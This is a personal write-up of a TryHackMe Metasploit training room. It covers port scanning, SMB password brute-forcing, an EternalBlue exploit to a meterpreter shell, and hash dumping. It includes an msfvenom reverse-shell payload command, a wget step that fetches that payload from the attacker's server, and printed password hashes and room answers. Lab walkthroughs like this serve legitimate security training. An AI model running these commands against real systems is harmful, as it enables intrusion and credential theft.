Hello friend,
this write-up is for the second Metasploit walkthrough room on TryHackMe. Let’s take a look. This room is more hands-on than the last one and lets you practice how to use Metasploit.
Task 2 – Scanning
How many ports are open on the target system?
For this, you can either use one of the portscan modules of Metasploit, or any other port scanner like nmap. First, I tried the portscan/syn module, which gave me a permission error. So I just used nmap, but I also tried it with higher privileges. After restarting Metasploit with sudo permissions… it found nothing. Then I tried the portscan/tcp module, which gave me results but took way longer than nmap.
So yeah, the answer is 5.
Using the relevant scanner, what NetBIOS name can you see?
Okay, after using the command search netbios we see a scanner/netbios/nbname module – looks promising.
I take a look at the options and think, “the target port is set to 137 – but we found NetBios on 139, let’s change that…” well, my first scan wasn’t successful. NetBios uses port 137 UDP for name resolution, and in the options it even says UDP. Port 139 we found, was the TCP port it uses. After changing it back and running it again, we find the name.
What is running on port 8000?
One option is to run a more in-depth scan with nmap, which I did.
Another option would be the http_version module of Metasploit:
What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.
Okay, for this task we should use the smb_login module to brute-force the login. Let’s do that. First, we have to configure our wordlist and the user name.
Since I use my own VM, I downloaded the wordlist earlier. If you use the AttackBox, the path for the wordlist is /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
And after a few seconds, the password is found:
Task 3 – Metasploit Database
Metasploit can use a database to save and reuse your findings. There are no questions for this task, but a lot of examples on how to use the database features.
Task 4 – Vulnerability Scanning
Who wrote the module that allows us to check SMTP servers for open relay?
We search for the module and check the info.
Task 5 – Exploitation
Now let’s get to the actual exploitation part!
Exploit one of the critical vulnerabilities on the target VM
Well, not a lot to go on here. First, let’s scan the target.
After that a more in-depth scan of the individual ports:
We can see, that it is a Windows 7 machine, which runs SMB on port 445 – it might be vulnerable to eternal blue. Which is the exploit example in the task description. There is a module to confirm that too.
You can find the scanner, as well as the exploit by using search eternal
The exploit uses a meterpreter/reverse_tcp shell as a default payload, which should be fine. We just have to set the RHOSTS IP address of our target, our IP address as LHOST, and run it.
I forgot to set my LHOST IP on my first try, and the exploit wasn’t working anymore, so I restarted the target machine. After the reboot, it worked.
Here we are, our meterpreter shell.
What is the content of the flag.txt file?
To get a list of all meterpreter commands, use the help command which shows us, that there is a search command.
We can also use the usual Linux commands to navigate the file system.
What is the NTLM hash of the password of the user “pirate”?
We can use hashdump to get the contents of the SAM database, which stores the user passwords in Windows.
The last part is the password hash:
8ce9a3ebd1647fcc5e04025019f4b875
Task 6 – Msfvenom
Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type “sudo su” to get a root shell, this will make things easier.
Okay.
Create a meterpreter payload in the .elf format (on the AttackBox, or your attacking machine of choice).
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP of your attacking machine> LPORT=4444 -f elf > shell.elf
Transfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://ATTACKING_10.10.33.51:9000/shell.elf to download it to the target machine).
On your machine use as described python3 -m http.server 9000
And on the target machine wget http://<your machines IP>:9000/shell.elf
Get a meterpreter session on the target machine.
Now we need to start Metasploit with msfconsole and create a listener.
use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set LHOST <your attacker ip> run
After that is done, switch back to the victim machine, Adjust the permissions on the shell so you can execute it with chmod +x shell.elf and then execute it with ./shell.elf
Use a post exploitation module to dump hashes of other users on the system.
The normal hashdump command from before is intended for Windows machines. On Linux, we have to use another module. This can be done, while you are in your meterpreter session with the command run post/linux/gather/hashdump
What is the other user’s password hash?
Since we logged in as murphy, the other user is claire
And her password hash is:
$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
That was the second room about Metasploit, one more to go.